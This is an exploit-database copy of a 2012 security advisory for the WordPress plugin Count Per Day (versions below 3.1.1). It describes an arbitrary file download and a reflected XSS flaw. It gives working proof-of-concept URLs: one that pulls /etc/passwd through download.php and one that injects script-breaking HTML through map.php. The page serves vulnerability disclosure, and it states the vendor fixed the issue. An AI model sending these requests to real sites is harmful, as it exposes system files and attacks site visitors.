WordPress Plugin Count Per Day – Multiple Vulnerabilities

  • 作者: 6Scan
    日期: 2012-01-12
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/18355/
  • #Exploit Title: Count-per-day WordPress plugin Arbitrary file download and XSS
    #Version: < 3.1.1
    #Date: 2011-01-12
    #Author 6Scan (http://6scan.com) security team
    #Software Link: http://wordpress.org/extend/plugins/count-per-day/
    #Official fix: This advisory is released after the vendor has responded and fixed the issue.
    #Description: User could call a remote script to download arbitrary file from the target system. Another script was vulnerable to non-persistent XSS
    
    PoC for File download
    192.168.0.1/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd
    
    PoC for XSS
    192.168.0.1/wp-content/plugins/count-per-day/map/map.php?map='")); </script><img src=http://www.bing.com//az/hprichbg?p=rb%2fOrcaWhales_ROW818916751.jpg>'